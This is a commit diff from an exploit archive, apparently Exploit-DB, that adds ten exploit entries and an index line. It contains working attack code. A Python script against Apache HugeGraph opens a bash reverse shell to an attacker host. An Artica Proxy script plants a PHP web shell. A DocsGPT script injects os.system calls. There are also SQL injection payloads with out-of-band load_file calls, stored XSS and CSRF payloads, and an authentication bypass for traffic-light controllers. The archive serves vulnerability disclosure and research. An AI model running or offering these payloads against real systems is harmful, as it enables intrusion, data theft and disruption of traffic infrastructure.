DB: 2025-04-10
10 changes to exploits/shellcodes/ghdb Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE) Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE) Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS) Artica Proxy 4.50 - Remote Code Execution (RCE) ChurchCRM 5.9.1 - SQL Injection PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF) ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS) DocsGPT 0.12.0 - Remote Code Execution
This commit is contained in:
parent
2bc15f74f8
commit
762197db08
10 changed files with 572 additions and 0 deletions
56
exploits/java/webapps/52149.py
Executable file
56
exploits/java/webapps/52149.py
Executable file
|
@ -0,0 +1,56 @@
|
|||
# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
|
||||
# Exploit Author: Yesith Alvarez
|
||||
# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
|
||||
# Version: Apache HugeGraph 1.0.0 - 1.2.0
|
||||
# CVE : CVE-2024–27348
|
||||
|
||||
from requests import Request, Session
|
||||
import sys
|
||||
import json
|
||||
|
||||
def title():
|
||||
print('''
|
||||
|
||||
______ _______ ____ ___ ____ _ _ ____ _____ _____ _ _ ___
|
||||
/ ___\ \ / / ____| |___ \ / _ \___ \| || | |___ \___ |___ /| || | ( _ )
|
||||
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ __) | / / |_ \| || |_ / _ \
|
||||
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____/ __/ / / ___) |__ _| (_) |
|
||||
\____| \_/ |_____| |_____|\___/_____| |_| |_____/_/ |____/ |_| \___/
|
||||
|
||||
[+] Reverse shell
|
||||
Author: Yesith Alvarez
|
||||
Github: https://github.com/yealvarez
|
||||
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
|
||||
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
|
||||
''')
|
||||
|
||||
|
||||
def exploit(url, lhost, lport):
|
||||
payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
|
||||
headers = {
|
||||
'Content-Type': 'application/json'}
|
||||
s = Session()
|
||||
url = url + "/gremlin"
|
||||
req = Request('POST', url, json=payload, headers=headers)
|
||||
prepped = req.prepare()
|
||||
del prepped.headers['Content-Type']
|
||||
resp = s.send(prepped,
|
||||
verify=False,
|
||||
timeout=15)
|
||||
print(prepped.headers)
|
||||
print(url)
|
||||
print(resp.headers)
|
||||
print(payload)
|
||||
print(resp.status_code)
|
||||
print(resp.text)
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
title()
|
||||
if(len(sys.argv) < 4):
|
||||
print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
|
||||
print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
|
||||
print('[+] Do not forget to run the listener: nc -lvp 4444\n')
|
||||
exit(0)
|
||||
else:
|
||||
exploit(sys.argv[1],sys.argv[2],sys.argv[3])
|
62
exploits/multiple/webapps/52148.txt
Normal file
62
exploits/multiple/webapps/52148.txt
Normal file
|
@ -0,0 +1,62 @@
|
|||
# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of
|
||||
Privilege Vulnerability
|
||||
# Exploit Author: Metin Yunus Kandemir
|
||||
# Vendor Homepage: https://www.manageengine.com/
|
||||
# Software Link: https://www.manageengine.com/products/ad-manager/
|
||||
# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
|
||||
# Version: ADManager Plus Build < 7210
|
||||
# Tested against: Build 7203
|
||||
# CVE: CVE-2024-24409
|
||||
|
||||
|
||||
# Description
|
||||
The Modify Computers is a predefined role in ADManager for managing
|
||||
computers. If a technician user has the Modify Computers privilege
|
||||
over a computer can change the userAccountControl and
|
||||
msDS-AllowedToDelegateTo attributes of the computer object. In this
|
||||
way, the technician user can set Constrained Kerberos Delegation over
|
||||
any computer within the Organizational Unit that the user was
|
||||
delegated.
|
||||
|
||||
Contrary to what ADManager claims the user who has the Modify
|
||||
Computers role can change the privilege of computer objects in the
|
||||
Active Directory. The Constrained Kerberos Delegation can be set for
|
||||
any service such as CIFS, LDAP, HOST services. Then the user can
|
||||
access these services by abusing the Constrained Kerberos Delegation.
|
||||
In addition, the Unconstrained Kerberos Delegation can be set over the
|
||||
computer objects by changing the userAccountControl attribute.
|
||||
Normally, only users that have SeEnableDelegationPrivilege privilege
|
||||
can set constrained kerberos delegation. Only members of the
|
||||
BUILTIN\Administrators group have this privilege by default. The
|
||||
delegated user for an Organizational Unit can not set constrained
|
||||
kerberos delegation even if a user has the GenericAll right over a
|
||||
computer account, so the delegation process in Active Directory does
|
||||
not grant this privilege. However, the technician user can use the
|
||||
SeEnableDelegationPrivilege right via the Modify Computers role.
|
||||
|
||||
# Vulnerability reasons
|
||||
1. ADMP Web App Authorization issue: Assigning a predefined Modify
|
||||
Computers role delegates the technician user to modify custom
|
||||
attributes of computers unexpectedly. Even though it appears that this
|
||||
privilege is not granted in the UI, the Additional Custom Attribute
|
||||
property is assigned and this leads to broken access control
|
||||
vulnerability.
|
||||
|
||||
2. There is no restriction for editing the userAccountControl and
|
||||
msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP
|
||||
application performs changes with domain admin privileges as designed
|
||||
so that if we can bypass some restrictions (e.g. format of attribute
|
||||
value), our requests are applied with domain admin privileges. This
|
||||
way we can edit the attributes userAccountControl and
|
||||
msDS-AllowedToDelegateTo.
|
||||
|
||||
# Impact
|
||||
A technician user elevates privileges from Domain User to Domain
|
||||
Admin. For example, the user can set Constrained Kerberos Delegation
|
||||
over CLIENT1$ for the CIFS service of the domain controller and access
|
||||
the CIFS service. As a result, the user is delegated to manage
|
||||
CLIENT1$ but he can access the CIFS service of the domain controller
|
||||
impersonating a user unexpectedly.
|
||||
|
||||
# Proof Of Concept
|
||||
https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
|
24
exploits/multiple/webapps/52151.txt
Normal file
24
exploits/multiple/webapps/52151.txt
Normal file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: MaxTime Database Editor 1.9 Authentication Bypass
|
||||
# Google Dork: N/A
|
||||
# Date: 07/09/2024
|
||||
# Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com
|
||||
# Vendor Homepage: https://www.q-free.com
|
||||
# Software Link: N/A
|
||||
# Version: 1.9
|
||||
# Tested on: (Intelight x-1) Linux 3.14.57
|
||||
# CVE : CVE-2024-38944
|
||||
|
||||
## Vulnerability Description
|
||||
This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor.
|
||||
Authentication is not required to exploit this vulnerability.
|
||||
|
||||
The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware.
|
||||
The issue results from the lack of authentication prior to allowing access to functionality.
|
||||
An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection,
|
||||
modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion.
|
||||
|
||||
## Steps to Reproduce
|
||||
|
||||
Navigate to the IP address of an identified controller
|
||||
When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address
|
||||
Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.
|
78
exploits/php/webapps/52146.py
Executable file
78
exploits/php/webapps/52146.py
Executable file
|
@ -0,0 +1,78 @@
|
|||
# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web
|
||||
application insecure deserialization (RCE)
|
||||
# Google Dork:
|
||||
# Date: 23-04-2024
|
||||
# Exploit Author: Madan
|
||||
# Vendor Homepage: https://artica-proxy.com/
|
||||
# Version: 4.40, 4.50
|
||||
# Tested on: [relevant os]
|
||||
# CVE : CVE-2024-2054
|
||||
|
||||
you can also find the exploit on my github repo:
|
||||
https://github.com/Madan301/CVE-2024-2054
|
||||
|
||||
|
||||
import requests
|
||||
import base64
|
||||
import urllib3
|
||||
from colorama import Fore
|
||||
|
||||
print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
|
||||
sometimes vary from how artica proxy interface is hosted")
|
||||
|
||||
URL = input("Enter url: ")
|
||||
if URL[-1]=="/":
|
||||
ACTUAL_URL = URL[:-1]
|
||||
else:
|
||||
ACTUAL_URL = URL
|
||||
|
||||
ARTICA_URL = ACTUAL_URL
|
||||
|
||||
def check(ARTICA_URL):
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
try:
|
||||
check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
|
||||
except Exception as e:
|
||||
print(Fore.RED+"Could not reach, check URL")
|
||||
if check.status_code==200:
|
||||
print(Fore.GREEN+"Vulnerable")
|
||||
return True
|
||||
else:
|
||||
print(Fore.RED+"Not Vulnerable")
|
||||
|
||||
|
||||
def exploit(ARTICA_URL):
|
||||
|
||||
payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
|
||||
payload_data = {
|
||||
"TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
|
||||
"cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
|
||||
"cache_serializer": "json",
|
||||
"cache_size": 999999999,
|
||||
"cache_data": {
|
||||
payload: {
|
||||
"cache_date": 0,
|
||||
"ttl": 999999999
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
while True:
|
||||
PAYLOAD_CMD = input("enter command: ")
|
||||
url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
response = requests.get(url, verify=False)
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
if response.status_code == 200:
|
||||
cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
|
||||
cmd_response = requests.get(cmd_url, verify=False)
|
||||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
||||
print(cmd_response.text)
|
||||
else:
|
||||
print("Failed to execute the payload")
|
||||
|
||||
check = check(ARTICA_URL=ACTUAL_URL)
|
||||
if check==True:
|
||||
exploit(ARTICA_URL=ARTICA_URL)
|
39
exploits/php/webapps/52147.NA
Normal file
39
exploits/php/webapps/52147.NA
Normal file
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
|
||||
# Date: 04/28/2024
|
||||
# Exploit Author: Ahmet Ümit BAYRAM
|
||||
# Vendor Homepage: https://anchorcms.com/
|
||||
# Software Link:
|
||||
https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
|
||||
# Version: latest
|
||||
# Tested on: MacOS
|
||||
|
||||
# Log in to Anchor CMS.
|
||||
# Click on "Create New Post".
|
||||
# Fill in the "Title" and enter the following payload in the field
|
||||
immediately below:
|
||||
# "><script>alert()</script>
|
||||
# Go to the homepage, and you will see the alert!
|
||||
|
||||
|
||||
### PoC Request ###
|
||||
|
||||
POST /anchor/admin/posts/edit/2 HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
|
||||
Gecko/20100101 Firefox/124.0
|
||||
Accept: */*
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 278
|
||||
Origin: http://127.0.0.1
|
||||
Connection: close
|
||||
Referer: http://127.0.0.1/anchor/admin/posts/edit/2
|
||||
Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
|
||||
anchorcms=hlko7b1dbdpjgn58himf2obht5
|
||||
Sec-Fetch-Dest: empty
|
||||
Sec-Fetch-Mode: cors
|
||||
Sec-Fetch-Site: same-origin
|
||||
|
||||
token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false
|
69
exploits/php/webapps/52150.NA
Normal file
69
exploits/php/webapps/52150.NA
Normal file
|
@ -0,0 +1,69 @@
|
|||
# Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting
|
||||
via Content Form
|
||||
# Date: 8-7-2024
|
||||
# Category: Web Application
|
||||
# Exploit Author: Jeremia Geraldi Sihombing
|
||||
# Version: 2.10.1
|
||||
# Tested on: Windows
|
||||
# CVE: CVE-2024-39143
|
||||
|
||||
Description:
|
||||
----------------
|
||||
A stored cross-site scripting (XSS) vulnerability exists in
|
||||
ResidenceCMS 2.10.1 that allows a low-privilege user to create
|
||||
malicious property content with HTML inside it, which acts as a
|
||||
stored XSS payload. If this property page is visited by anyone
|
||||
including the administrator, then the XSS payload will be triggered..
|
||||
|
||||
Steps to reproduce
|
||||
-------------------------
|
||||
|
||||
1. Login as a low privilege user with property edit capability.
|
||||
|
||||
2. Create or Edit one of the user owned property
|
||||
(We can user the default property owned by the user).
|
||||
3. Fill the content form with XSS payload using the Code View feature.
|
||||
Before saving it make sure to go back using the usual view to see if the HTML
|
||||
is rendered or not.
|
||||
|
||||
Vulnerable parameter name: property[property_description][content]
|
||||
|
||||
Example Payload: <img src="x" onerror="alert(document.cookie)">
|
||||
|
||||
4. After saving the new property content and clicking the 'Finish Editing',
|
||||
go to the page and see the XSS is triggered.
|
||||
It is possible to trigger the XSS by using any account or even
|
||||
unauthorized account.
|
||||
|
||||
Burp Request
|
||||
-------------------
|
||||
|
||||
POST /en/user/property/7/edit HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
|
||||
Gecko/20100101 Firefox/127.0
|
||||
Accept: text/html,application/xhtml
|
||||
xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 1111
|
||||
Origin: http://localhost
|
||||
Connection: keep-alive
|
||||
Referer: http://localhost/en/user/property/7/edit
|
||||
Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
|
||||
PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-User: ?1
|
||||
Priority: u=1
|
||||
|
||||
property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
|
||||
renovated 2-bedroom 2-bathroom
|
||||
flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
|
||||
renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
|
||||
Blvd, Tampa, FL
|
||||
33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
|
||||
src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg
|
148
exploits/php/webapps/52152.NA
Normal file
148
exploits/php/webapps/52152.NA
Normal file
|
@ -0,0 +1,148 @@
|
|||
## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection
|
||||
|
||||
## Author: Sanan Qasimzada
|
||||
|
||||
## Date: 06.07.2024
|
||||
|
||||
## Vendor: http://churchcrm.io/
|
||||
|
||||
## Software: https://github.com/ChurchRM/CRM
|
||||
|
||||
## Reference: https://portswigger.net/web-security/sql-injection
|
||||
|
||||
|
||||
|
||||
## Description:
|
||||
|
||||
In the manual insertion point 1 - parameter `EID` appears to be
|
||||
|
||||
vulnerable to SQL injection attacks.
|
||||
|
||||
No need for cookies, no need admin authentication and etc.
|
||||
|
||||
The attacker easily can steal information from this system by using
|
||||
|
||||
this vulnerability.
|
||||
|
||||
|
||||
|
||||
STATUS: HIGH Vulnerability - CRITICAL
|
||||
|
||||
|
||||
|
||||
[+]Payload:
|
||||
|
||||
```mysql
|
||||
|
||||
---
|
||||
|
||||
Parameter: EID (GET)
|
||||
|
||||
Type: boolean-based blind
|
||||
|
||||
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
|
||||
|
||||
Payload: EID=(select
|
||||
|
||||
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
|
||||
\\ior'))
|
||||
|
||||
OR NOT 2407=2407
|
||||
|
||||
|
||||
|
||||
Type: time-based blind
|
||||
|
||||
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||
|
||||
Payload: EID=(select
|
||||
|
||||
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
|
||||
\\ior'))
|
||||
|
||||
AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX)
|
||||
|
||||
|
||||
|
||||
Type: UNION query
|
||||
|
||||
Title: MySQL UNION query (UTF8) - 11 columns
|
||||
|
||||
Payload: EID=(select
|
||||
|
||||
load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com
|
||||
\\ior'))
|
||||
|
||||
UNION ALL SELECT
|
||||
|
||||
'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'#
|
||||
|
||||
---
|
||||
|
||||
|
||||
|
||||
```
|
||||
|
||||
|
||||
|
||||
## Reproduce:
|
||||
|
||||
[href](
|
||||
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1
|
||||
)
|
||||
|
||||
|
||||
|
||||
## Proof and Exploit:
|
||||
|
||||
[href](https://streamable.com/1eqhw2)
|
||||
|
||||
|
||||
|
||||
## Time spend:
|
||||
|
||||
01:00:00
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
--
|
||||
|
||||
System Administrator - Infrastructure Engineer
|
||||
|
||||
Penetration Testing Engineer
|
||||
|
||||
Exploit developer at
|
||||
|
||||
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
|
||||
|
||||
https://www.exploit-db.com/
|
||||
|
||||
home page: https://www.nu11secur1ty.com/
|
||||
|
||||
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
||||
|
||||
nu11secur1ty <http://nu11secur1ty.com/>
|
||||
|
||||
|
||||
|
||||
--
|
||||
|
||||
System Administrator - Infrastructure Engineer
|
||||
|
||||
Penetration Testing Engineer
|
||||
|
||||
Exploit developer at https://packetstormsecurity.com/
|
||||
|
||||
https://cve.mitre.org/index.html
|
||||
|
||||
https://cxsecurity.com/ and https://www.exploit-db.com/
|
||||
|
||||
0day Exploit DataBase https://0day.today/
|
||||
|
||||
home page: https://www.nu11secur1ty.com/
|
||||
|
||||
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
|
||||
|
||||
nu11secur1ty <http://nu11secur1ty.com/>
|
54
exploits/php/webapps/52153.NA
Normal file
54
exploits/php/webapps/52153.NA
Normal file
|
@ -0,0 +1,54 @@
|
|||
# Exploit Title: pz-frontend-manager <= 1.0.5 - CSRF change user profile
|
||||
picture
|
||||
# Date: 2024-07-01
|
||||
# Exploit Author: Vuln Seeker Cybersecurity Team
|
||||
# Vendor Homepage: https://wordpress.org/plugins/pz-frontend-manager/
|
||||
# Version: <= 1.0.5
|
||||
# Tested on: Firefox
|
||||
# Contact me: vulns@vulnseeker.org
|
||||
|
||||
The plugin does not have CSRF checks in some places, which could allow
|
||||
attackers to make logged in users perform unwanted actions via CSRF attacks.
|
||||
|
||||
Proof of concept:
|
||||
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: localhost:10003
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
|
||||
Gecko/20100101 Firefox/124.0
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 1093
|
||||
Origin: http://localhost:10003
|
||||
Sec-GPC: 1
|
||||
Connection: close
|
||||
Cookie: Cookie
|
||||
|
||||
action=pzfm_upload_avatar&imageData=data%3Aimage%2Fpng%3Bbase64%2CiVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx%2FBy7bYvtl4Y8Qn%2BtEjty6WxuQ0KkfOM5wJEeEkT1bsigU%2BxGQV%2BQfZ2ned0LAkLnyQ4XV2XB%2Fk%2BjXdTs8Mc1%2BUlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO%2BqN1sFvJm%2BIScB7s3uo8ZVzC8RrsXjIuqp2n0d%2BsxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0%2B6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5%2FBKh8H%2F3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs%2FEBXgoZ6Jf2KMNMYz4FgBJjTGkxR%2FH67vm%2FH8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle%2FP%2FMPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO%2Byev2NVDtZLeX5rvD9lu0zauxW%2Ba6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF%2BxW%2BYcT47Jkdzi4TpT%2BlPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg%3D%3D&userID=1
|
||||
|
||||
|
||||
CSRF Exploit:
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://localhost:10003/wp-admin/admin-ajax.php"
|
||||
method="POST">
|
||||
<input type="hidden" name="action" value="pzfm_upload_avatar" />
|
||||
<input type="hidden" name="imageData"
|
||||
value="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADcAAAA3CAAAAACNsI2aAAAACXBIWXMAAAB5AAAAeQBPsriEAAAB6ElEQVR42rVWO46EMAzNadAcY3vaOQMXoXcXKZehS8NpqNxamw8JxDYra1Zjhgge9jhx/By7bYvtl4Y8Qn+tEjty6WxuQ0KkfOM5wJEeEkT1bsigU+xGQV+QfZ2ned0LAkLnyQ4XV2XB/k+jXdTs8Mc1+UlvQehEt5Fit7hLFsUfqfOk3d1lJ9VO+qN1sFvJm+IScB7s3uo8ZVzC8RrsXjIuqp2n0d+sxFNbHxCw9cF34yn2L5jyJWndIprzRfqLpvw0+6PCh1fjgxpP5NL4VzlYEa6zOYDgzyvk0cMbykMek6THipSXAD5/BKh8H/3JGZTxPgM9Px9WDL0CkM1ORJie48nsWAXQ8kW1YxlknKfIWJs/EBXgoZ6Jf2KMNMYz4FgBJjTGkxR/H67vm/H8eP9ShlyRqfli24c0svy0zLNXgOkNtQJEle/P/MPOv8T3TGZIZIbO7sL7BMON74nkuQqUj4XvnMvwiNCBjO+yev2NVDtZLeX5rvD9lu0zauxW+a6dBvJ8H5Gyfzz3wIBkO57rYECyHeeWF+xW+YcT47Jkdzi4TpT+lPNdIv9Z34fxNOxf0PhO91yw5MuMen56AxLPOtG7W9T63SCQ2k9Uol1so3bVnrog2JTyU57n1bb37n3s5s8Of5RfsaTdSlfuyUAAAAA8dEVYdGNvbW1lbnQAIEltYWdlIGdlbmVyYXRlZCBieSBHTlUgR2hvc3RzY3JpcHQgKGRldmljZT1wbm1yYXcpCvqLFvMAAABKdEVYdHNpZ25hdHVyZQA4NWUxYWU0YTJmYmE3OGVlZDRmZDhmMGFjZjIzNzYwOWU4NGY1NDk2Y2RlMjBiNWQ3NmM5Y2JjMjk4YzRhZWJjJecJ2gAAAABJRU5ErkJggg=="
|
||||
/>
|
||||
<input type="hidden" name="userID" value="1"" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
<script>
|
||||
history.pushState('', '', '/');
|
||||
document.forms[0].submit();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Profile picture of user 1 will be changed in the dashboard
|
||||
http://localhost:10003/dashboard/?dashboard=profile
|
||||
|
||||
Reference:
|
||||
https://wpscan.com/vulnerability/73ba55a5-6cff-40fc-9686-30c50f060732/
|
33
exploits/python/webapps/52145.py
Executable file
33
exploits/python/webapps/52145.py
Executable file
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
|
||||
# Date: 09/04/2025
|
||||
# Exploit Author: Shreyas Malhotra (OSMSEC)
|
||||
# Vendor Homepage: https://github.com/arc53/docsgpt
|
||||
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
|
||||
# Version: 0.8.1 through 0.12.0
|
||||
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
|
||||
# CVE: CVE-2025-0868
|
||||
|
||||
import requests
|
||||
|
||||
# TARGET CONFIG
|
||||
TARGET = "http://10.0.2.15:7091" # Change this
|
||||
|
||||
# Malicious payload string - carefully escaped - modify the python code if necessary
|
||||
malicious_data = (
|
||||
'user=1&source=reddit&name=other&data={"source":"reddit",'
|
||||
'"client_id":"1111","client_secret":1111,"user_agent":"111",'
|
||||
'"search_queries":[""],"number_posts":10,'
|
||||
'"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
|
||||
)
|
||||
|
||||
headers = {
|
||||
"Content-Type": "application/x-www-form-urlencoded"
|
||||
}
|
||||
|
||||
try:
|
||||
response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
|
||||
print(f"[+] Status Code: {response.status_code}")
|
||||
print("[+] Response Body:")
|
||||
print(response.text)
|
||||
except Exception as e:
|
||||
print(f"[-] Error sending request: {e}")
|
|
@ -5471,6 +5471,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
39886,exploits/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",webapps,java,,2016-06-06,2016-06-14,1,,,,,http://www.exploit-db.comapache-continuum-1.4.2-bin.tar.gz,
|
||||
49398,exploits/java/webapps/49398.rb,"Apache Flink 1.11.0 - Unauthenticated Arbitrary File Read (Metasploit)",2021-01-08,"SunCSR Team",webapps,java,,2021-01-08,2021-01-08,1,CVE-2020-17519,,,,,
|
||||
48978,exploits/java/webapps/48978.py,"Apache Flink 1.9.x - File Upload RCE (Unauthenticated)",2020-11-02,bigger.wing,webapps,java,,2020-11-02,2020-11-02,0,,,,,,
|
||||
52149,exploits/java/webapps/52149.py,"Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)",2025-04-09,"Yesith Alvarez",webapps,java,,2025-04-09,2025-04-09,0,CVE-2024-27348,,,,,
|
||||
37110,exploits/java/webapps/37110.py,"Apache JackRabbit - WebDAV XML External Entity",2015-05-26,"Mikhail Egorov",webapps,java,8080,2015-05-26,2017-11-02,0,CVE-2015-1833;OSVDB-122382,,,,,
|
||||
